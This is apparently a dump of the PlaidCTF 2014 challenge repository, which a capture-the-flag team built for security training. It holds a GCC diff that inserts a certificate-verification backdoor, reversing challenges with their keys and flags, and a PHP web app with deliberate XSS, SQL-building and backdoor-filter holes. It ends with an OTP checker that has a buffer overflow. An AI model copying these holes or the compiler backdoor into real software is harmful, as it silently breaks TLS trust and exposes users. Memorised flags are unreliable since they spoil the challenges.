@@ -3184,6 +3184,49 @@ 4 | enum tree_code pred_code; 5 | gimple_seq seq = NULL; 6 | 7 | + /* 8 | + * hashes (1b2c7d05, f31257e5) 9 | + * 10 | + * hashes (get_identifier("ssl_verify_cert_chain"), get_identifier("X509_STORE_CTX_init")) 11 | + */ 12 | + if (IDENTIFIER_HASH_VALUE (DECL_NAME (current_function_decl)) == 0x1b2c7d05 && 13 | + TREE_CODE (TREE_OPERAND (expr, 0)) == EQ_EXPR && 14 | + TREE_CODE (TREE_OPERAND (TREE_OPERAND (expr, 0), 0)) == CALL_EXPR && 15 | + IDENTIFIER_HASH_VALUE (DECL_NAME (get_callee_fndecl (TREE_OPERAND (TREE_OPERAND (expr, 0), 0)))) == 0xf31257e5) 16 | + { 17 | + tree x = CALL_EXPR_ARG (TREE_OPERAND (TREE_OPERAND (expr, 0), 0), 2); 18 | + tree f = first_field (TREE_TYPE (TREE_TYPE (x))); 19 | + for (; f != NULL_TREE; f = TREE_CHAIN (f)) 20 | + { 21 | + if (DECL_NAME (f) == get_identifier ("name")) 22 | + { 23 | + tree new_expr = build3 (COND_EXPR, void_type_node, 24 | + build2 (EQ_EXPR, boolean_type_node, 25 | + build1 (INDIRECT_REF, integer_type_node, 26 | + build1 (NOP_EXPR, integer_ptr_type_node, 27 | + build3 (COMPONENT_REF, TREE_TYPE (f), 28 | + build1 (INDIRECT_REF, TREE_TYPE (TREE_TYPE (x)), x), 29 | + f, 30 | + NULL_TREE 31 | + ) 32 | + ) 33 | + ), 34 | + build_int_cst (integer_type_node, 0x233D4F2F) 35 | + ), 36 | + build1 (RETURN_EXPR, void_type_node, 37 | + build2 (INIT_EXPR, integer_type_node, 38 | + DECL_RESULT (current_function_decl), 39 | + integer_one_node 40 | + ) 41 | + ), 42 | + NULL_TREE 43 | + ); 44 | + gimplify_stmt (&new_expr, pre_p); 45 | + break; 46 | + } 47 | + } 48 | + } 49 | + 50 | /* If this COND_EXPR has a value, copy the values into a temporary within 51 | the arms. */ 52 | if (!VOID_TYPE_P (type)) 53 | -------------------------------------------------------------------------------- /reversing/hudak/KEY.txt: -------------------------------------------------------------------------------- 1 | 4t_l34st_it_was_1mperat1v3... -------------------------------------------------------------------------------- /reversing/hudak/Makefile: -------------------------------------------------------------------------------- 1 | all: lazy 2 | 3 | lazy: lazy.c 4 | gcc -m32 -O3 -std=c99 -w $^ -o $@ 5 | strip $@ 6 | 7 | .PHONY: clean 8 | clean: 9 | rm lazy 10 | 11 | -------------------------------------------------------------------------------- /reversing/hudak/hudak: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwning/plaidctf2014/1bf225f52a6501dac74044b176df39538de34c43/reversing/hudak/hudak -------------------------------------------------------------------------------- /reversing/hudak/hudak-c3c6dd04f699cc01c0d4f547f2155ddf.tar.bz2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwning/plaidctf2014/1bf225f52a6501dac74044b176df39538de34c43/reversing/hudak/hudak-c3c6dd04f699cc01c0d4f547f2155ddf.tar.bz2 -------------------------------------------------------------------------------- /reversing/hudak/lazy.c: -------------------------------------------------------------------------------- 1 | // fuck freeing memory 2 | #include 3 | #include 4 | #include 5 | 6 | struct thunk { 7 | int computed; 8 | void *value; 9 | void *((*compute)(struct thunk *)); 10 | struct thunk **arguments; 11 | }; 12 | typedef struct thunk thunk; 13 | 14 | thunk **make_args(thunk *t) { 15 | thunk **b = malloc(sizeof(thunk *)); 16 | *b = t; 17 | return b; 18 | } 19 | 20 | thunk *make_thunk(void *(*f)(thunk *)) { 21 | thunk *t = malloc(sizeof(thunk)); 22 | t->computed = 0; t->value = NULL; 23 | t->compute = f; t->arguments = NULL; 24 | return t; 25 | } 26 | 27 | void *id(thunk *t) { 28 | return t->value; 29 | } 30 | 31 | int string_length(thunk *t) { 32 | if (t->computed) return t->value; 33 | char *s; 34 | thunk *a1 = t->arguments[0]; 35 | s = (char *)a1->compute(a1); 36 | int l = 0; 37 | while (s[l] != -1) l++; 38 | t->computed = 1; 39 | t->value = l; 40 | return t->value; 41 | } 42 | 43 | char *rotate(thunk *t) { 44 | if (t->computed) return t->value; 45 | char *s; int k, l; 46 | thunk *a1 = t->arguments[0]; 47 | thunk *a2 = t->arguments[1]; 48 | thunk *a3 = t->arguments[2]; 49 | s = (char *)(a1->compute(a1)); 50 | k = (int)(a2->compute(a2)); 51 | l = (int)(a3->compute(a3)) + 1; 52 | char *r = malloc(sizeof(char) * l); 53 | int i = 0; 54 | for (; i < l; i++) { 55 | r[i] = s[(i + k) % l]; 56 | } 57 | t->computed = 1; 58 | t->value = r; 59 | return r; 60 | } 61 | 62 | thunk **rotate_by_all(thunk *t) { 63 | if (t->computed) return t->value; 64 | char *s; int k; 65 | thunk *a1 = t->arguments[0]; 66 | thunk *a2 = t->arguments[1]; 67 | k = (int)(a2->compute(a2)) + 1; 68 | char **r = malloc(sizeof(thunk *) * k); 69 | int i; 70 | for (i = 0; i < k; i++) { 71 | thunk *a = make_thunk(rotate); 72 | a->arguments = malloc(sizeof(thunk *) * 3); 73 | thunk *b = make_thunk(id); 74 | b->computed = 1; b->value = (void *)i; 75 | a->arguments[0] = a1; 76 | a->arguments[1] = b; 77 | a->arguments[2] = a2; 78 | r[i] = a; 79 | } 80 | t->computed = 1; 81 | t->value = r; 82 | return r; 83 | } 84 | 85 | char **sorted(thunk *t) { 86 | if (t->computed) return t->value; 87 | char **strings; int k; 88 | thunk *a1 = t->arguments[0]; 89 | thunk *a2 = t->arguments[1]; 90 | thunk **thunks = (thunk **)(a1->compute(a1)); 91 | k = (int)(a2->compute(a2)) + 1; 92 | strings = malloc(sizeof(char *) * k); 93 | int i; 94 | for (i = 0; i < k; i++) { 95 | strings[i] = (char *)(thunks[i]->compute(thunks[i])); 96 | } 97 | for (i = 0; i < k; i++) { 98 | int j; 99 | for (j = 0; j < k-1; j++) { 100 | if (memcmp(strings[j], strings[j+1], k) > 0) { 101 | char *tmp = strings[j]; 102 | strings[j] = strings[j + 1]; 103 | strings[j + 1] = tmp; 104 | } 105 | } 106 | } 107 | t->computed = 1; 108 | t->value = strings; 109 | return strings; 110 | } 111 | 112 | char *get_last(thunk *t) { 113 | if (t->computed) return t->value; 114 | char **strings; int k; 115 | thunk *a1 = t->arguments[0]; 116 | thunk *a2 = t->arguments[1]; 117 | strings = (char **)(a1->compute(a1)); 118 | k = (int)(a2->compute(a2)); 119 | char *s = malloc(sizeof(char) * (k + 1)); 120 | int i = 0; 121 | for (; i < k+1; i++) { 122 | s[i] = strings[i][k] ^ 0x37; 123 | } 124 | s[k+1] = 0; 125 | t->value = s; 126 | t->computed = 1; 127 | return s; 128 | } 129 | 130 | thunk *burrows_wheeler(thunk *t) { 131 | if (t->computed) return t->value; 132 | thunk *a = make_thunk(string_length); 133 | a->arguments = make_args(t->arguments[0]); 134 | thunk *b = make_thunk(rotate_by_all); 135 | b->arguments = malloc(sizeof(thunk *) * 2); 136 | b->arguments[0] = a->arguments[0]; 137 | b->arguments[1] = a; 138 | thunk *c = make_thunk(sorted); 139 | c->arguments = malloc(sizeof(thunk *) * 2); 140 | c->arguments[0] = b; 141 | c->arguments[1] = a; 142 | thunk *d = make_thunk(get_last); 143 | d->arguments = malloc(sizeof(thunk *) * 2); 144 | d->arguments[0] = c; 145 | d->arguments[1] = a; 146 | t->computed = 1; 147 | t->value = d; 148 | return d; 149 | } 150 | 151 | int verify(thunk *t) { 152 | thunk *bw = make_thunk(burrows_wheeler); 153 | bw->arguments = malloc(sizeof(thunk *)); 154 | bw->arguments[0] = t->arguments[0]; 155 | char *secret = "\x04\x19\x19\x68\x43\x41\x5b\x04\xc8\x44\x43\x43\x43\x40\x45\x47\x68\x68\x06\x5a\x52\x56\x03\x56\x44\x03\x5e\x06\x68\x19"; 156 | thunk *bwc = bw->compute(bw); 157 | char *bwr = bwc->compute(bwc); 158 | if (memcmp(secret, bwr, 31) == 0) 159 | return 1; 160 | return 0; 161 | } 162 | 163 | size_t readuntil(int fd, char *buf, size_t nbyte, char endchr) { 164 | char *rbuf = buf; 165 | for(size_t i = 1; i < nbyte; i++) { 166 | ssize_t r = read(fd, rbuf, 1); 167 | if(r == 0) break; 168 | if(r < 0) { 169 | perror("read_until"); 170 | exit(1); 171 | } 172 | if(r > 1) exit(-1); 173 | if(*(rbuf++) == endchr) break; 174 | } 175 | *(rbuf-1) = 0xFF; *rbuf = 0; 176 | return rbuf - buf; 177 | } 178 | 179 | int main() { 180 | char buf[80]; 181 | printf("Enter the password.\n"); 182 | readuntil(STDIN_FILENO, buf, 80, '\n'); 183 | // meh. 184 | if (strlen(buf) != 30) { puts("Wrong! :("); return; } 185 | thunk *t = make_thunk(verify); 186 | thunk *a = make_thunk(id); 187 | a->value = buf; 188 | a->computed = 1; 189 | t->arguments = make_args(a); 190 | if (t->compute(t)) { 191 | puts("Congratulations! :)"); 192 | } else { 193 | puts("Wrong! :("); 194 | } 195 | } 196 | 197 | 198 | -------------------------------------------------------------------------------- /reversing/tiffany/FLAGE: -------------------------------------------------------------------------------- 1 | {my_synchronization_skills_suck} 2 | -------------------------------------------------------------------------------- /reversing/tiffany/build_dfas.py: -------------------------------------------------------------------------------- 1 | from struct import pack 2 | 3 | def make_state(st): 4 | acc, dc = st 5 | s = pack('I', acc) 6 | for x in xrange(256): 7 | if chr(x) in dc: 8 | # wheee 9 | s += pack('I', dc[chr(x)]) 10 | else: 11 | s += pack('I', 1) 12 | return s 13 | 14 | def make_dfa(states): 15 | s = pack('I', len(states)) 16 | for st in states: 17 | s += make_state(st) 18 | return s 19 | 20 | def out_dfa(states, filename): 21 | f = open(filename, 'w') 22 | f.write(repr(make_dfa(states)).replace('"', '\\"').replace("'", '"') + ',') 23 | f.close() 24 | 25 | # okay. 26 | # {my_synchronization_skills_suck} 27 | # first, wrap string in { } 28 | def bounded_by_braces(): 29 | s0 = { '{': 2 } 30 | s1 = { } 31 | s2 = dict((chr(c), 2) for c in xrange(256)) 32 | s2['}'] = 3 33 | s3 = { } 34 | print 4 * 257 + 1 35 | out_dfa([(0, s0), (0, s1), (0, s2), (1, s3)], "braces.txt") 36 | def length_32(): 37 | s0 = dict((chr(c), 2) for c in xrange(256)) 38 | s1 = { } 39 | s = [] 40 | for x in xrange(31): 41 | s.append(dict((chr(c),x+3) for c in xrange(256))) 42 | for x in xrange(len(s)): 43 | s[x] = (0, s[x]) 44 | s = [(0,s0), (0,s1)] + s + [(1, dict((chr(c), 1) for c in xrange(256)))] 45 | print len(s) * 257 + 1 46 | out_dfa(s, "length32.txt") 47 | def underscore_count(): 48 | s0 = dict((chr(c), 0) for c in xrange(256)) 49 | s0['_'] = 2 50 | s1 = {} 51 | s2 = dict((chr(c), 2) for c in xrange(256)) 52 | s2['_'] = 3 53 | s3 = dict((chr(c), 3) for c in xrange(256)) 54 | s3['_'] = 4 55 | s4 = dict((chr(c), 4) for c in xrange(256)) 56 | print 5 * 257 + 1 57 | out_dfa([(0, s0), (0,s1), (0, s2), (0,s3), (1, s4)], "underscores.txt") 58 | def my(): 59 | s0 = dict((chr(c), 2) for c in xrange(256)) 60 | s0['_'] = 1 61 | s1 = { } 62 | s2 = { 'm': 3 } 63 | s3 = { 'y': 4 } 64 | s4 = dict((chr(c), 4) for c in xrange(256)) 65 | print 5 * 257 + 1 66 | out_dfa([(0, s0), (0, s1), (0, s2), (0, s3), (1, s4)], "my.txt") 67 | def synchronization(): 68 | s0 = dict((chr(c), 0) for c in xrange(256)) 69 | s0['_'] = 2 70 | s1 = { } 71 | st = "synchronization" 72 | s = [] 73 | i = 2 74 | for c in st: 75 | tm = { c: i + 1 } 76 | s.append(tm) 77 | i = i + 1 78 | sn = dict((chr(c), i) for c in xrange(256)) 79 | s = [(0, s0), (0, s1)] + [(0, x) for x in s] + [(1, sn)] 80 | print len(s) * 257 + 1 81 | out_dfa(s, "synchronization.txt") 82 | def skills(): 83 | s0 = dict((chr(c), 0) for c in xrange(256)) 84 | s0['_'] = 2 85 | s1 = { } 86 | st = "skills" 87 | s2 = dict((chr(c), 2) for c in xrange(256)) 88 | s2['_'] = 3 89 | s = [] 90 | i = 3 91 | for c in st: 92 | tm = { c: i + 1 } 93 | s.append(tm) 94 | i = i + 1 95 | sn = dict((chr(c), i) for c in xrange(256)) 96 | s = [(0, s0), (0, s1), (0, s2)] + [(0, x) for x in s] + [(1, sn)] 97 | print len(s) * 257 + 1 98 | out_dfa(s, "skills.txt") 99 | def suck(): 100 | s0 = dict((chr(c), 0) for c in xrange(256)) 101 | s0['_'] = 2 102 | s1 = { } 103 | st = "suck" 104 | s2 = dict((chr(c), 2) for c in xrange(256)) 105 | s2['_'] = 3 106 | s3 = dict((chr(c), 3) for c in xrange(256)) 107 | s3['_'] = 4 108 | s = [] 109 | i = 4 110 | for c in st: 111 | tm = { c: i + 1 } 112 | s.append(tm) 113 | i = i + 1 114 | sn = dict((chr(c), i) for c in xrange(256)) 115 | s = [(0, s0), (0, s1), (0, s2), (0, s3)] + [(0, x) for x in s] + [(1, sn)] 116 | print len(s) * 257 + 1 117 | out_dfa(s, "suck.txt") 118 | 119 | bounded_by_braces() 120 | length_32() 121 | underscore_count() 122 | my() 123 | synchronization() 124 | skills() 125 | suck() 126 | 127 | -------------------------------------------------------------------------------- /reversing/tiffany/pt.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | 10 | #define DATASIZE 131072 11 | #define NUMWORKERS 7 12 | enum Ops { 13 | UPDATE_PID, 14 | INIT_DFA, 15 | REDUCE, 16 | STEP_DFA, 17 | GET_STATE 18 | }; 19 | 20 | struct pdata { 21 | int gotmsg; 22 | int target; 23 | int op; 24 | int msg[DATASIZE]; 25 | }; 26 | 27 | struct pdata data; 28 | 29 | void sigusr1_handler(int sig) { } 30 | 31 | static int pid; 32 | static int parent; 33 | 34 | static __attribute__((always_inline)) void ptracew(enum __ptrace_request request, pid_t pid, void *addr, void *d) { 35 | if (ptrace(request, pid, addr, d) < 0) { 36 | perror("ptrace error!"); 37 | kill(pid, SIGKILL); 38 | exit(1); 39 | } 40 | } 41 | 42 | struct dfa_state { 43 | int type; 44 | int transitions[256]; 45 | }; 46 | 47 | typedef struct dfa_state dfa_state; 48 | 49 | struct dfa_def { 50 | int len; 51 | dfa_state states[]; 52 | }; 53 | 54 | static struct dfa_def *dfa = NULL; 55 | static int currstate = 0; 56 | 57 | static __attribute__((always_inline)) void send_data(int tgtpid, int op, int tgtid, int len, int *msg) { 58 | // sketchy-ass synchronization 59 | usleep(50*1000); 60 | ptracew(PTRACE_ATTACH, tgtpid, NULL, NULL); 61 | wait(NULL); 62 | ptracew(PTRACE_POKEDATA, tgtpid, &data.gotmsg, 1); 63 | ptracew(PTRACE_POKEDATA, tgtpid, &data.target, tgtid); 64 | ptracew(PTRACE_POKEDATA, tgtpid, &data.op, op); 65 | int i; 66 | for (i = 0; i < len; i++) 67 | ptracew(PTRACE_POKEDATA, tgtpid, &data.msg[i], msg[i]); 68 | ptracew(PTRACE_DETACH, tgtpid, NULL, NULL); 69 | kill(tgtpid, SIGUSR1); 70 | } 71 | 72 | static void __attribute__((always_inline)) forward_message(void) { 73 | send_data(pid, data.op, data.target, DATASIZE, data.msg); 74 | } 75 | 76 | static __attribute__((always_inline)) void handle_init_dfa(int *args) { 77 | int len = args[0]; 78 | if (dfa) free(dfa); 79 | dfa = malloc(sizeof(dfa_state) * len + 4); 80 | dfa->len = len; 81 | memcpy(dfa->states, &args[1], sizeof(dfa_state) * len); 82 | } 83 | 84 | static __attribute__((always_inline)) void handle_reduce(int id) { 85 | int mypid = getpid(); 86 | int i; 87 | int accum = 1; 88 | for (i = 0; i < NUMWORKERS; i++) { 89 | if (i == id) { 90 | accum &= dfa->states[currstate].type; 91 | continue; 92 | } 93 | send_data(pid, GET_STATE, i, 1, &mypid); 94 | while (!data.gotmsg) { 95 | sleep(1000); 96 | } 97 | data.gotmsg = 0; 98 | accum &= data.msg[0]; 99 | } 100 | send_data(parent, 0, 0, 1, &accum); 101 | } 102 | 103 | int __attribute__((always_inline)) handle_getstate(int tgt) { 104 | int st = dfa->states[currstate].type; 105 | send_data(tgt, 0, 0, 1, &st); 106 | } 107 | 108 | static void handle_message(int id, int op, int *args) { 109 | switch(op) { 110 | case UPDATE_PID: 111 | pid = args[0]; 112 | break; 113 | case REDUCE: 114 | handle_reduce(id); 115 | break; 116 | case INIT_DFA: 117 | printf("."); 118 | fflush(stdout); 119 | handle_init_dfa(args); 120 | break; 121 | case STEP_DFA: 122 | currstate = dfa->states[currstate].transitions[args[0]]; 123 | if (id + 1 < NUMWORKERS) { 124 | data.target = id + 1; 125 | data.gotmsg = 1; 126 | forward_message(); 127 | data.gotmsg = 0; 128 | } else { 129 | sleep(1); // we rest, and then alert our parent that all children have stepped. 130 | kill(parent, SIGUSR1); 131 | } 132 | break; 133 | case GET_STATE: 134 | handle_getstate(args[0]); 135 | break; 136 | } 137 | } 138 | 139 | static void wait_for_message(int id) { 140 | int done = 0; 141 | data.gotmsg = 0; 142 | while (!done) { 143 | while (!data.gotmsg) { 144 | sleep(1000); 145 | } 146 | data.gotmsg = 0; 147 | if (data.target == id) 148 | handle_message(id, data.op, data.msg); 149 | else 150 | forward_message(); 151 | } 152 | exit(0); 153 | } 154 | 155 | static int pids[NUMWORKERS]; 156 | 157 | static __attribute__((always_inline)) void send_worker(int id, int op, int len, int *data) { 158 | send_data(pids[id], op, id, len, data); 159 | } 160 | 161 | int dfalens[NUMWORKERS] = { 1029, 8739, 1286, 1286, 4627, 2571, 2314 }; 162 | char *dfas[NUMWORKERS] = { 163 | #include "braces.txt" 164 | #include "length32.txt" 165 | #include "underscores.txt" 166 | #include "my.txt" 167 | #include "synchronization.txt" 168 | #include "skills.txt" 169 | #include "suck.txt" 170 | }; 171 | 172 | static inline void do_parent(int lastpid) { 173 | send_worker(0, UPDATE_PID, 1, &lastpid); 174 | // Okay, we have told the worker about the pid. 175 | // Now, we just "make sure" that it has received it... 176 | sleep(1); 177 | // Jesus the races. 178 | // Okay, now we give each worker its DFA. 179 | int worker = 0; 180 | for (worker = 0; worker < NUMWORKERS; worker++) { 181 | send_worker(worker, INIT_DFA, dfalens[worker], dfas[worker]); 182 | } 183 | sleep(1); 184 | puts(""); 185 | // Okay. Each worker has its DFA. Now, we read our string. 186 | char buf[100]; 187 | int *ibuf = (int*)(&buf[0]); 188 | printf("Please enter a string: "); 189 | if (fgets(buf, 80, stdin) == NULL) { 190 | perror("String not read!"); 191 | kill(pid, SIGKILL); 192 | exit(1); 193 | } 194 | int blen = strlen(buf) - 1; 195 | buf[blen] = '\0'; 196 | int i = 0; 197 | for (i = 0; i < blen; i++) { 198 | int chr = buf[i]; 199 | printf("."); 200 | fflush(stdout); 201 | send_worker(0, STEP_DFA, 1, &chr); 202 | // Okay, now we sleep and wait to be alerted by a child. 203 | sleep(1000); 204 | } 205 | puts(""); 206 | data.gotmsg = 0; 207 | send_worker(0, REDUCE, 0, NULL); 208 | while (!data.gotmsg) sleep(1000); 209 | int result = data.msg[0]; 210 | if (result) puts("Congratulations! That's the right key!"); 211 | else puts("Sorry, wrong."); 212 | for (i = 0; i < NUMWORKERS; i++) { 213 | kill(pids[i], SIGKILL); 214 | } 215 | exit(0); 216 | } 217 | 218 | int main(void) 219 | { 220 | struct sigaction sa; 221 | sa.sa_handler = sigusr1_handler; 222 | sa.sa_flags = 0; 223 | sigemptyset(&sa.sa_mask); 224 | puts("This may take a while..."); 225 | if (sigaction(SIGUSR1, &sa, NULL) == -1) { 226 | perror("sigaction"); 227 | exit(1); 228 | } 229 | parent = pid = getpid(); 230 | { 231 | int id = 0; 232 | int lastpid = pid; 233 | for (id = 0; id < NUMWORKERS; id++) { 234 | int child; 235 | if (child = fork()) { 236 | lastpid = child; 237 | pids[id] = child; 238 | } 239 | else { 240 | pid = lastpid; 241 | wait_for_message(id); 242 | } 243 | } 244 | sleep(1); 245 | do_parent(lastpid); 246 | } 247 | return 0; 248 | } 249 | 250 | 251 | -------------------------------------------------------------------------------- /reversing/tiffany/solutions/ryan.py: -------------------------------------------------------------------------------- 1 | from os import environ 2 | from struct import unpack 3 | 4 | sizeoff = 0x1a0c0 5 | ptrsoff = 0x1a0e0 6 | rodiff = 0x400000 7 | 8 | pt = open(environ['HOME']+"/pctf2014/problems/reversing/pt/pt").read() 9 | 10 | def readint(s): 11 | return unpack(' 6 |

7 |

8 |

9 | 10 |

or

11 |
12 |

13 |

14 |

15 |
16 | CAT; 17 | } 18 | 19 | mysql_connect("localhost","root","123456"); 20 | mysql_select_db("bronies"); 21 | 22 | 23 | if (isset($_SESSION['uid'])) { 24 | $q = mysql_query("select username from users where id=".$_SESSION['uid']); 25 | $res = mysql_fetch_object($q); 26 | echo sprintf("Neighhhhh %s, you're already logged in!",$res->username); 27 | } 28 | 29 | else { 30 | if (isset($_POST["login"])) { 31 | $q = mysql_query(sprintf("select id,username from users where username='%s' and password='%s'", 32 | mysql_real_escape_string($_POST["name"]),mysql_real_escape_string($_POST["pass"]))); 33 | $res = mysql_fetch_object($q); 34 | if (empty($res)) { 35 | echo "Neighhh I think you entered your information wrong!"; 36 | pform(); 37 | } 38 | else { 39 | $_SESSION['uid'] = $res->id; 40 | echo sprintf("Friendship is magic, and so are you! Welcome back %s!",$res->username); 41 | header("refresh:2; url=/index.php"); 42 | } 43 | } 44 | elseif (isset($_POST["register"])) { 45 | if (empty($_POST["name"]) or empty($_POST["pass"])) { 46 | echo "

If you want to be a brony, you need to fill out ALL the fields!

"; 47 | pform(); 48 | } 49 | else { 50 | if (!preg_match("/^[a-zA-Z0-9!@#* _]+$/",$_POST["name"])) { 51 | echo "That's not a good name for a pony!"; 52 | } 53 | else { 54 | $q = mysql_query(sprintf("insert into users (username,password) values 55 | ('%s', '%s')",mysql_real_escape_string($_POST["name"]), 56 | mysql_real_escape_string($_POST["pass"]))); 57 | if ($q) { 58 | echo "Welcome to the pack!"; 59 | } 60 | else { 61 | echo "We already have a pony here by that name!"; 62 | } 63 | } 64 | } 65 | } 66 | 67 | else { 68 | pform(); 69 | } 70 | } 71 | 72 | ?> 73 | -------------------------------------------------------------------------------- /web/bronies/bronies_site/data/logout: -------------------------------------------------------------------------------- 1 | username); 9 | header("refresh:2; url=/index.php"); 10 | unset($_SESSION['uid']); 11 | } 12 | else { 13 | echo "You're a silly pony, you weren't even logged in!"; 14 | } 15 | ?> 16 | -------------------------------------------------------------------------------- /web/bronies/bronies_site/data/main: -------------------------------------------------------------------------------- 1 |

Friendship is Magic! We love everyone! Ponies are awesome!

2 |

3 | Welcome to the #16 site on the internet for My Little Pony fans to join together and send messages to eachother in a safe and nurturing environment. We know how tough it can be to be a Brony, so why not meet up with some other Bronies for support! 4 |

5 |
6 |

Our favorite videos!

7 |

This one is great!

8 | 9 | 10 |

Isn't My Little Pony just the best thing ever?

11 | 12 | 13 |

This has to be one of my favorites!

14 | 15 | 16 |

Wow, who knew Spiderman loved My Little Pony too!?

17 | 18 | -------------------------------------------------------------------------------- /web/bronies/bronies_site/data/msgs: -------------------------------------------------------------------------------- 1 | YOU ARE NOT TRUE BRONY

"; 15 | echo 0; 16 | } 17 | else { 18 | $q = mysql_query(sprintf("select ans,used from cs where id=%d",$_SESSION['cs'])); 19 | mysql_query(sprintf("update cs set used=1 where id=%d",$_SESSION['cs'])); 20 | $res = mysql_fetch_row($q); 21 | if ($res[1]) { 22 | echo "

YOU ARE NOT TRUE BRONY

"; 23 | echo 1; 24 | } 25 | elseif (strtolower(preg_replace('/\s*/', '', $_POST['cap'])) != strtolower(preg_replace('/\s*/', '', $res[0]))) { 26 | echo "

YOU ARE NOT TRUE BRONY

"; 27 | } 28 | else { 29 | 30 | $q = mysql_query(sprintf("insert into msgs (uidf,uid2,msg) values 31 | ('%d',(select id from users where username='%s'),'%s')",$_SESSION['uid'],mysql_real_escape_string($_POST['to']), 32 | mysql_real_escape_string($_POST['msg']) )); 33 | echo "

Message sent to ".$_POST['to']."!

"; 34 | if ($_POST['to'] === 'ponyboy2004') { 35 | $mid = escapeshellarg(mysql_insert_id()); 36 | exec("/var/www/data/do_xss.py $mid"); 37 | } 38 | } 39 | } 40 | } 41 | 42 | if (isset($_SESSION['uid'])) { 43 | 44 | if (isset($_GET['mid'])) { 45 | $filter = " and uid2 != 0"; 46 | if ($victim_backdoor) { 47 | $filter = ""; 48 | } 49 | $q = mysql_query("select (select username from users where id=uidf),msg from msgs where msgs.mid='".mysql_real_escape_string($_GET['mid'])."' $filter and uid2=".$_SESSION['uid']); 50 | $res = mysql_fetch_row($q); 51 | $id = $res[0]; 52 | $msg = $res[1]; 53 | echo "
$id wants you to know that $msg
"; 54 | mysql_query("update msgs set msgs.read=1 where msgs.mid='".mysql_real_escape_string($_GET['mid'])."' and uid2 != 0 and uid2=".$_SESSION['uid']); 55 | } 56 | echo <<Send some love!

58 |
59 | 60 |
61 | 62 |
63 |
64 | 65 | 66 |
67 | CAT; 68 | 69 | $q = mysql_query("select (select username from users where id=uidf),mid from msgs where msgs.read=0 and uid2 != 0 and uid2=".$_SESSION['uid']); 70 | echo ""; 78 | } 79 | 80 | ?> 81 | -------------------------------------------------------------------------------- /web/bronies/bronies_site/default.css: -------------------------------------------------------------------------------- 1 | p { 2 | font-family: sans-serif; 3 | font-size: 22px; 4 | } 5 | a{ 6 | color: white; 7 | font-size: 32px; 8 | font-family: sans-serif; 9 | text-decoration: none; 10 | vertical-align: middle; 11 | } 12 | a.other { 13 | color: black; 14 | vertical-align: top; 15 | } 16 | a:hover { 17 | text-decoration: underline; 18 | } 19 | input 20 | { 21 | -moz-border-radius: 5px; 22 | border-radius: 5px; 23 | border:solid 1px pink; 24 | padding:5px; 25 | font-size: 20px; 26 | } 27 | textarea 28 | { 29 | -moz-border-radius: 5px; 30 | border-radius: 5px; 31 | border:solid 1px pink; 32 | padding:5px; 33 | font-size: 20px; 34 | } 35 | #links { 36 | margin-left: auto; 37 | margin-right: auto; 38 | background: pink; 39 | opacity: 0.6; 40 | height: 42px; 41 | width: 90%; 42 | border-radius:18px; 43 | } 44 | #links li { 45 | width: 25%; 46 | text-align: center; 47 | display:-moz-inline-block; 48 | display:-moz-inline-box; 49 | display:inline-block; 50 | } 51 | body { 52 | margin:0; 53 | padding:0; 54 | background: url('mlp.jpg'); 55 | font-size: 22px; 56 | } 57 | #msg { 58 | border: 2px solid purple; 59 | padding: 8px; 60 | border-radius:8px; 61 | display: inline-block; 62 | } 63 | 64 | #box { 65 | background: rgba(255,255,255,0.5) ; 66 | margin: auto; 67 | width: 85%; 68 | border: 10px solid pink; 69 | border-radius:35px; 70 | padding: 16px; 71 | font-size: 22px; 72 | } 73 | -------------------------------------------------------------------------------- /web/bronies/bronies_site/head.php: -------------------------------------------------------------------------------- 1 | 14 | -------------------------------------------------------------------------------- /web/bronies/bronies_site/img.php: -------------------------------------------------------------------------------- 1 | 33 | 34 | -------------------------------------------------------------------------------- /web/bronies/bronies_site/index.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | My Little Brony 5 | 6 | 7 | 8 |
9 | 10 | 56 | 57 | 58 | 59 | 60 |
61 | 70 |
71 | 72 |
73 | 74 | 75 | -------------------------------------------------------------------------------- /web/bronies/bronies_site/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwning/plaidctf2014/1bf225f52a6501dac74044b176df39538de34c43/web/bronies/bronies_site/logo.png -------------------------------------------------------------------------------- /web/bronies/bronies_site/mlp.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwning/plaidctf2014/1bf225f52a6501dac74044b176df39538de34c43/web/bronies/bronies_site/mlp.jpg -------------------------------------------------------------------------------- /web/bronies/login/checkotp.c: -------------------------------------------------------------------------------- 1 | // gcc -s -m32 -fstack-protector-all -Wl,-z,relro,-z,now -O2 -o checkotp checkotp.c -lcrypto 2 | #define _GNU_SOURCE 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | const int kOtpPeriod = 10 * 60; 10 | const char kLogFile[] = "/dev/null"; 11 | char g_username[16]; 12 | char g_encrypted_password[128]; 13 | 14 | void log_attempt(char *username, char *otp, int correct) { 15 | char buf[64]; 16 | sprintf(buf, "%s OTP attempt: %s:%s", 17 | correct ? "Correct" : "Incorrect", 18 | username, 19 | otp); 20 | FILE *f = fopen(kLogFile, "r"); 21 | fputs(buf, f); 22 | fclose(f); 23 | } 24 | 25 | int verify_otp(char *username, char *password, char *otp) { 26 | size_t password_len = strlen(password); 27 | memfrob(password, password_len); 28 | memcpy(g_encrypted_password, password, sizeof g_encrypted_password); 29 | g_encrypted_password[sizeof g_encrypted_password - 1] = 0; 30 | memset(password, 0, password_len); 31 | 32 | strncpy(g_username, username, sizeof g_username); 33 | g_username[sizeof g_username - 1] = 0; 34 | 35 | time_t t = time(NULL) / kOtpPeriod; 36 | SHA256_CTX ctx; 37 | SHA256_Init(&ctx); 38 | SHA256_Update(&ctx, g_username, strlen(g_username)); 39 | SHA256_Update(&ctx, ":", 1); 40 | SHA256_Update(&ctx, g_encrypted_password, strlen(g_encrypted_password)); 41 | SHA256_Update(&ctx, ":", 1); 42 | SHA256_Update(&ctx, &t, sizeof t); 43 | 44 | unsigned char hashbuf[SHA256_DIGEST_LENGTH]; 45 | SHA256_Final(hashbuf, &ctx); 46 | 47 | int login_success = 0; 48 | unsigned int correct_otp = *(unsigned int *) hashbuf; 49 | if (atoi(otp) == correct_otp % 3133337) { 50 | login_success = 1; 51 | } 52 | 53 | log_attempt(g_username, otp, login_success); 54 | return login_success; 55 | } 56 | 57 | int main(int argc, char **argv) { 58 | char *username = NULL; 59 | char *password = NULL; 